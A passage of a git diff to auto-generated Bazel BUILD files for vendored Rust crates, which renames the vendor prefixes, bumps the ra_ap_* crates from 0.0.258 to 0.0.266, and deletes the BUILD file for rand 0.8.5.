"@vendor__tracing-0.1.41//:tracing", - "@vendor__triomphe-0.1.14//:triomphe", + "@vendor_ts__anyhow-1.0.96//:anyhow", + "@vendor_ts__cargo_metadata-0.18.1//:cargo_metadata", + "@vendor_ts__itertools-0.12.1//:itertools", + "@vendor_ts__la-arena-0.3.1//:la_arena", + "@vendor_ts__ra_ap_base_db-0.0.266//:ra_ap_base_db", + "@vendor_ts__ra_ap_cfg-0.0.266//:ra_ap_cfg", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern", + "@vendor_ts__ra_ap_paths-0.0.266//:ra_ap_paths", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx", + "@vendor_ts__ra_ap_toolchain-0.0.266//:ra_ap_toolchain", + "@vendor_ts__rustc-hash-2.1.1//:rustc_hash", + "@vendor_ts__semver-1.0.24//:semver", + "@vendor_ts__serde-1.0.218//:serde", + "@vendor_ts__serde_json-1.0.139//:serde_json", + "@vendor_ts__tracing-0.1.41//:tracing", + "@vendor_ts__triomphe-0.1.14//:triomphe", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_salsa-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_salsa-0.0.266.bazel similarity index 86% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_salsa-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_salsa-0.0.266.bazel index a9542ad6008d..bab83cc8eebd 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_salsa-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_salsa-0.0.266.bazel @@ -31,7 +31,7 @@ rust_library( crate_root = "src/lib.rs", edition = "2021", proc_macro_deps = [ - "@vendor__ra_ap_salsa-macros-0.0.258//:ra_salsa_macros", + "@vendor_ts__ra_ap_salsa-macros-0.0.266//:ra_salsa_macros", ], rustc_flags = [ "--cap-lints=allow", @@ -82,16 +82,16 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__indexmap-2.7.0//:indexmap", - "@vendor__itertools-0.12.1//:itertools", - "@vendor__lock_api-0.4.12//:lock_api", - "@vendor__oorandom-11.1.4//:oorandom", - "@vendor__parking_lot-0.12.3//:parking_lot", - "@vendor__rustc-hash-2.1.0//:rustc_hash", - "@vendor__smallvec-1.13.2//:smallvec", - "@vendor__tracing-0.1.41//:tracing", - "@vendor__triomphe-0.1.14//:triomphe", + "@vendor_ts__indexmap-2.7.0//:indexmap", + "@vendor_ts__itertools-0.12.1//:itertools", + "@vendor_ts__lock_api-0.4.12//:lock_api", + "@vendor_ts__oorandom-11.1.4//:oorandom", + "@vendor_ts__parking_lot-0.12.3//:parking_lot", + "@vendor_ts__rustc-hash-2.1.1//:rustc_hash", + "@vendor_ts__smallvec-1.14.0//:smallvec", + "@vendor_ts__tracing-0.1.41//:tracing", + "@vendor_ts__triomphe-0.1.14//:triomphe", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_salsa-macros-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_salsa-macros-0.0.266.bazel similarity index 94% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_salsa-macros-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_salsa-macros-0.0.266.bazel index b753230db46a..53313071100f 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_salsa-macros-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_salsa-macros-0.0.266.bazel @@ -79,11 +79,11 @@ rust_proc_macro( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__heck-0.4.1//:heck", - "@vendor__proc-macro2-1.0.93//:proc_macro2", - "@vendor__quote-1.0.38//:quote", - "@vendor__syn-2.0.96//:syn", + "@vendor_ts__heck-0.4.1//:heck", + "@vendor_ts__proc-macro2-1.0.93//:proc_macro2", + "@vendor_ts__quote-1.0.38//:quote", + "@vendor_ts__syn-2.0.98//:syn", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_span-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_span-0.0.266.bazel similarity index 85% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_span-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_span-0.0.266.bazel index ee3121891d2d..b77f7a5723da 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_span-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_span-0.0.266.bazel @@ -17,9 +17,9 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx": "stdx", - "@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax": "syntax", - "@vendor__ra_ap_vfs-0.0.258//:ra_ap_vfs": "vfs", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx": "stdx", + "@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax": "syntax", + "@vendor_ts__ra_ap_vfs-0.0.266//:ra_ap_vfs": "vfs", }, compile_data = glob( include = ["**"], @@ -88,15 +88,15 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__hashbrown-0.14.5//:hashbrown", - "@vendor__la-arena-0.3.1//:la_arena", - "@vendor__ra_ap_salsa-0.0.258//:ra_salsa", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx", - "@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax", - "@vendor__ra_ap_vfs-0.0.258//:ra_ap_vfs", - "@vendor__rustc-hash-2.1.0//:rustc_hash", - "@vendor__text-size-1.1.1//:text_size", + "@vendor_ts__hashbrown-0.14.5//:hashbrown", + "@vendor_ts__la-arena-0.3.1//:la_arena", + "@vendor_ts__ra_ap_salsa-0.0.266//:ra_salsa", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx", + "@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax", + "@vendor_ts__ra_ap_vfs-0.0.266//:ra_ap_vfs", + "@vendor_ts__rustc-hash-2.1.1//:rustc_hash", + "@vendor_ts__text-size-1.1.1//:text_size", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_stdx-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_stdx-0.0.266.bazel similarity index 84% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_stdx-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_stdx-0.0.266.bazel index 6c81bb672056..dec7e842d90b 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_stdx-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_stdx-0.0.266.bazel @@ -79,25 +79,25 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__always-assert-0.2.0//:always_assert", - "@vendor__crossbeam-channel-0.5.14//:crossbeam_channel", - "@vendor__itertools-0.12.1//:itertools", - "@vendor__jod-thread-0.1.2//:jod_thread", - "@vendor__libc-0.2.169//:libc", + "@vendor_ts__always-assert-0.2.0//:always_assert", + "@vendor_ts__crossbeam-channel-0.5.14//:crossbeam_channel", + "@vendor_ts__itertools-0.12.1//:itertools", + "@vendor_ts__jod-thread-0.1.2//:jod_thread", + "@vendor_ts__libc-0.2.169//:libc", ] + select({ "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [ - "@vendor__miow-0.6.0//:miow", # cfg(windows) - "@vendor__windows-sys-0.52.0//:windows_sys", # cfg(windows) + "@vendor_ts__miow-0.6.0//:miow", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "@rules_rust//rust/platform:i686-pc-windows-msvc": [ - "@vendor__miow-0.6.0//:miow", # cfg(windows) - "@vendor__windows-sys-0.52.0//:windows_sys", # cfg(windows) + "@vendor_ts__miow-0.6.0//:miow", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [ - "@vendor__miow-0.6.0//:miow", # cfg(windows) - "@vendor__windows-sys-0.52.0//:windows_sys", # cfg(windows) + "@vendor_ts__miow-0.6.0//:miow", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "//conditions:default": [], }), diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_syntax-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_syntax-0.0.266.bazel similarity index 82% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_syntax-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_syntax-0.0.266.bazel index 02cf67802e69..de3c0271fd46 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_syntax-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_syntax-0.0.266.bazel @@ -17,8 +17,8 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra_ap_parser-0.0.258//:ra_ap_parser": "parser", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx": "stdx", + "@vendor_ts__ra_ap_parser-0.0.266//:ra_ap_parser": "parser", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx": "stdx", }, compile_data = glob( include = ["**"], @@ -83,20 +83,20 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__cov-mark-2.0.0//:cov_mark", - "@vendor__either-1.13.0//:either", - "@vendor__indexmap-2.7.0//:indexmap", - "@vendor__itertools-0.12.1//:itertools", - "@vendor__ra-ap-rustc_lexer-0.87.0//:ra_ap_rustc_lexer", - "@vendor__ra_ap_parser-0.0.258//:ra_ap_parser", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx", - "@vendor__rowan-0.15.15//:rowan", - "@vendor__rustc-hash-2.1.0//:rustc_hash", - "@vendor__smol_str-0.3.2//:smol_str", - "@vendor__tracing-0.1.41//:tracing", - "@vendor__triomphe-0.1.14//:triomphe", + "@vendor_ts__cov-mark-2.0.0//:cov_mark", + "@vendor_ts__either-1.14.0//:either", + "@vendor_ts__indexmap-2.7.0//:indexmap", + "@vendor_ts__itertools-0.12.1//:itertools", + "@vendor_ts__ra-ap-rustc_lexer-0.97.0//:ra_ap_rustc_lexer", + "@vendor_ts__ra_ap_parser-0.0.266//:ra_ap_parser", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx", + "@vendor_ts__rowan-0.15.15//:rowan", + "@vendor_ts__rustc-hash-2.1.1//:rustc_hash", + "@vendor_ts__smol_str-0.3.2//:smol_str", + "@vendor_ts__tracing-0.1.41//:tracing", + "@vendor_ts__triomphe-0.1.14//:triomphe", ], ) exports_files(["rust.ungram"]) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_syntax-bridge-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_syntax-bridge-0.0.266.bazel similarity index 80% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_syntax-bridge-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_syntax-bridge-0.0.266.bazel index 62290545bbc8..501bd5f18418 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_syntax-bridge-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_syntax-bridge-0.0.266.bazel @@ -17,12 +17,12 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern": "intern", - "@vendor__ra_ap_parser-0.0.258//:ra_ap_parser": "parser", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span": "span", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx": "stdx", - "@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax": "syntax", - "@vendor__ra_ap_tt-0.0.258//:ra_ap_tt": "tt", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern": "intern", + "@vendor_ts__ra_ap_parser-0.0.266//:ra_ap_parser": "parser", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span": "span", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx": "stdx", + "@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax": "syntax", + "@vendor_ts__ra_ap_tt-0.0.266//:ra_ap_tt": "tt", }, compile_data = glob( include = ["**"], @@ -87,15 +87,15 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern", - "@vendor__ra_ap_parser-0.0.258//:ra_ap_parser", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx", - "@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax", - "@vendor__ra_ap_tt-0.0.258//:ra_ap_tt", - "@vendor__rustc-hash-2.1.0//:rustc_hash", - "@vendor__tracing-0.1.41//:tracing", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern", + "@vendor_ts__ra_ap_parser-0.0.266//:ra_ap_parser", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx", + "@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax", + "@vendor_ts__ra_ap_tt-0.0.266//:ra_ap_tt", + "@vendor_ts__rustc-hash-2.1.1//:rustc_hash", + "@vendor_ts__tracing-0.1.41//:tracing", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_toolchain-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_toolchain-0.0.266.bazel similarity index 96% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_toolchain-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_toolchain-0.0.266.bazel index 86dfdc8d6c3b..66f181536d6a 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_toolchain-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_toolchain-0.0.266.bazel @@ -79,9 +79,9 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__camino-1.1.9//:camino", - "@vendor__home-0.5.11//:home", + "@vendor_ts__camino-1.1.9//:camino", + "@vendor_ts__home-0.5.11//:home", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_tt-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_tt-0.0.266.bazel similarity index 89% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_tt-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_tt-0.0.266.bazel index b3de52733253..19c7faf10dd2 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_tt-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_tt-0.0.266.bazel @@ -17,8 +17,8 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern": "intern", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx": "stdx", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern": "intern", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx": "stdx", }, compile_data = glob( include = ["**"], @@ -83,12 +83,12 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__arrayvec-0.7.6//:arrayvec", - "@vendor__ra-ap-rustc_lexer-0.87.0//:ra_ap_rustc_lexer", - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx", - "@vendor__text-size-1.1.1//:text_size", + "@vendor_ts__arrayvec-0.7.6//:arrayvec", + "@vendor_ts__ra-ap-rustc_lexer-0.97.0//:ra_ap_rustc_lexer", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx", + "@vendor_ts__text-size-1.1.1//:text_size", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_vfs-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_vfs-0.0.266.bazel similarity index 86% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_vfs-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_vfs-0.0.266.bazel index e370e63c4a08..af56a94962c1 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_vfs-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_vfs-0.0.266.bazel @@ -17,8 +17,8 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra_ap_paths-0.0.258//:ra_ap_paths": "paths", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx": "stdx", + "@vendor_ts__ra_ap_paths-0.0.266//:ra_ap_paths": "paths", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx": "stdx", }, compile_data = glob( include = ["**"], @@ -83,15 +83,15 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__crossbeam-channel-0.5.14//:crossbeam_channel", - "@vendor__fst-0.4.7//:fst", - "@vendor__indexmap-2.7.0//:indexmap", - "@vendor__nohash-hasher-0.2.0//:nohash_hasher", - "@vendor__ra_ap_paths-0.0.258//:ra_ap_paths", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx", - "@vendor__rustc-hash-2.1.0//:rustc_hash", - "@vendor__tracing-0.1.41//:tracing", + "@vendor_ts__crossbeam-channel-0.5.14//:crossbeam_channel", + "@vendor_ts__fst-0.4.7//:fst", + "@vendor_ts__indexmap-2.7.0//:indexmap", + "@vendor_ts__nohash-hasher-0.2.0//:nohash_hasher", + "@vendor_ts__ra_ap_paths-0.0.266//:ra_ap_paths", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx", + "@vendor_ts__rustc-hash-2.1.1//:rustc_hash", + "@vendor_ts__tracing-0.1.41//:tracing", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_vfs-notify-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_vfs-notify-0.0.266.bazel similarity index 84% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_vfs-notify-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_vfs-notify-0.0.266.bazel index 43deef421ae0..97a009bdce5b 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_vfs-notify-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_vfs-notify-0.0.266.bazel @@ -17,9 +17,9 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra_ap_paths-0.0.258//:ra_ap_paths": "paths", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx": "stdx", - "@vendor__ra_ap_vfs-0.0.258//:ra_ap_vfs": "vfs", + "@vendor_ts__ra_ap_paths-0.0.266//:ra_ap_paths": "paths", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx": "stdx", + "@vendor_ts__ra_ap_vfs-0.0.266//:ra_ap_vfs": "vfs", }, compile_data = glob( include = ["**"], @@ -84,16 +84,16 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__crossbeam-channel-0.5.14//:crossbeam_channel", - "@vendor__notify-6.1.1//:notify", - "@vendor__ra_ap_paths-0.0.258//:ra_ap_paths", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx", - "@vendor__ra_ap_vfs-0.0.258//:ra_ap_vfs", - "@vendor__rayon-1.10.0//:rayon", - "@vendor__rustc-hash-2.1.0//:rustc_hash", - "@vendor__tracing-0.1.41//:tracing", - "@vendor__walkdir-2.5.0//:walkdir", + "@vendor_ts__crossbeam-channel-0.5.14//:crossbeam_channel", + "@vendor_ts__notify-8.0.0//:notify", + "@vendor_ts__ra_ap_paths-0.0.266//:ra_ap_paths", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx", + "@vendor_ts__ra_ap_vfs-0.0.266//:ra_ap_vfs", + "@vendor_ts__rayon-1.10.0//:rayon", + "@vendor_ts__rustc-hash-2.1.1//:rustc_hash", + "@vendor_ts__tracing-0.1.41//:tracing", + "@vendor_ts__walkdir-2.5.0//:walkdir", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rand-0.8.5.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rand-0.8.5.bazel deleted file mode 100644 index de831037046f..000000000000 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rand-0.8.5.bazel +++ /dev/null @@ -1,170 +0,0 @@ -############################################################################### -# @generated -# DO NOT MODIFY: This file is auto-generated by a crate_universe tool. To -# regenerate this file, run the following: -# -# bazel run @@//misc/bazel/3rdparty:vendor_tree_sitter_extractors -############################################################################### - -load("@rules_rust//rust:defs.bzl", "rust_library") - -package(default_visibility = ["//visibility:public"]) - -rust_library( - name = "rand", - srcs = glob( - include = ["**/*.rs"], - allow_empty = True, - ), - compile_data = glob( - include = ["**"], - allow_empty = True, - exclude = [ - "**/* *", - ".tmp_git_root/**/*", - "BUILD", - "BUILD.bazel", - "WORKSPACE", - "WORKSPACE.bazel", - ], - ), - crate_features = [ - "alloc", - "default", - "getrandom", - "libc", - "rand_chacha", - "std", - "std_rng", - ], - crate_root = "src/lib.rs", - edition = "2018", - rustc_flags = [ - "--cap-lints=allow", - ], - tags = [ - "cargo-bazel", - "crate-name=rand", - "manual", - "noclippy", - "norustfmt", - ], - target_compatible_with = select({ - "@rules_rust//rust/platform:aarch64-apple-darwin": [], - "@rules_rust//rust/platform:aarch64-apple-ios": [], - "@rules_rust//rust/platform:aarch64-apple-ios-sim": [], - "@rules_rust//rust/platform:aarch64-linux-android": [], - "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [], - "@rules_rust//rust/platform:aarch64-unknown-fuchsia": [], - "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [], - "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [], - "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [], - "@rules_rust//rust/platform:aarch64-unknown-uefi": [], - "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [], - "@rules_rust//rust/platform:armv7-linux-androideabi": [], - "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [], - "@rules_rust//rust/platform:i686-apple-darwin": [], - "@rules_rust//rust/platform:i686-linux-android": [], - "@rules_rust//rust/platform:i686-pc-windows-msvc": [], - "@rules_rust//rust/platform:i686-unknown-freebsd": [], - "@rules_rust//rust/platform:i686-unknown-linux-gnu": [], - "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [], - "@rules_rust//rust/platform:riscv32imc-unknown-none-elf": [], - "@rules_rust//rust/platform:riscv64gc-unknown-none-elf": [], - "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [], - "@rules_rust//rust/platform:thumbv7em-none-eabi": [], - "@rules_rust//rust/platform:thumbv8m.main-none-eabi": [], - "@rules_rust//rust/platform:wasm32-unknown-unknown": [], - "@rules_rust//rust/platform:wasm32-wasip1": [], - "@rules_rust//rust/platform:x86_64-apple-darwin": [], - "@rules_rust//rust/platform:x86_64-apple-ios": [], - "@rules_rust//rust/platform:x86_64-linux-android": [], - "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [], - "@rules_rust//rust/platform:x86_64-unknown-freebsd": [], - "@rules_rust//rust/platform:x86_64-unknown-fuchsia": [], - "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [], - "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [], - "@rules_rust//rust/platform:x86_64-unknown-none": [], - "@rules_rust//rust/platform:x86_64-unknown-uefi": [], - "//conditions:default": ["@platforms//:incompatible"], - }), - version = "0.8.5", - deps = [ - "@vendor__rand_chacha-0.3.1//:rand_chacha", - "@vendor__rand_core-0.6.4//:rand_core", - ] + select({ - "@rules_rust//rust/platform:aarch64-apple-darwin": [ - "@vendor__libc-0.2.169//:libc", # aarch64-apple-darwin - ], - "@rules_rust//rust/platform:aarch64-apple-ios": [ - "@vendor__libc-0.2.169//:libc", # aarch64-apple-ios - ], - "@rules_rust//rust/platform:aarch64-apple-ios-sim": [ - "@vendor__libc-0.2.169//:libc", # aarch64-apple-ios-sim - ], - "@rules_rust//rust/platform:aarch64-linux-android": [ - "@vendor__libc-0.2.169//:libc", # aarch64-linux-android - ], - "@rules_rust//rust/platform:aarch64-unknown-fuchsia": [ - "@vendor__libc-0.2.169//:libc", # aarch64-unknown-fuchsia - ], - "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # aarch64-unknown-linux-gnu - ], - "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [ - "@vendor__libc-0.2.169//:libc", # aarch64-unknown-linux-gnu, aarch64-unknown-nixos-gnu - ], - "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [ - "@vendor__libc-0.2.169//:libc", # aarch64-unknown-nto-qnx710 - ], - "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [ - "@vendor__libc-0.2.169//:libc", # arm-unknown-linux-gnueabi - ], - "@rules_rust//rust/platform:armv7-linux-androideabi": [ - "@vendor__libc-0.2.169//:libc", # armv7-linux-androideabi - ], - "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [ - "@vendor__libc-0.2.169//:libc", # armv7-unknown-linux-gnueabi - ], - "@rules_rust//rust/platform:i686-apple-darwin": [ - "@vendor__libc-0.2.169//:libc", # i686-apple-darwin - ], - "@rules_rust//rust/platform:i686-linux-android": [ - "@vendor__libc-0.2.169//:libc", # i686-linux-android - ], - "@rules_rust//rust/platform:i686-unknown-freebsd": [ - "@vendor__libc-0.2.169//:libc", # i686-unknown-freebsd - ], - "@rules_rust//rust/platform:i686-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # i686-unknown-linux-gnu - ], - "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # powerpc-unknown-linux-gnu - ], - "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # s390x-unknown-linux-gnu - ], - "@rules_rust//rust/platform:x86_64-apple-darwin": [ - "@vendor__libc-0.2.169//:libc", # x86_64-apple-darwin - ], - "@rules_rust//rust/platform:x86_64-apple-ios": [ - "@vendor__libc-0.2.169//:libc", # x86_64-apple-ios - ], - "@rules_rust//rust/platform:x86_64-linux-android": [ - "@vendor__libc-0.2.169//:libc", # x86_64-linux-android - ], - "@rules_rust//rust/platform:x86_64-unknown-freebsd": [ - "@vendor__libc-0.2.169//:libc", # x86_64-unknown-freebsd - ], - "@rules_rust//rust/platform:x86_64-unknown-fuchsia": [ - "@vendor__libc-0.2.169//:libc", # x86_64-unknown-fuchsia - ], - "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", 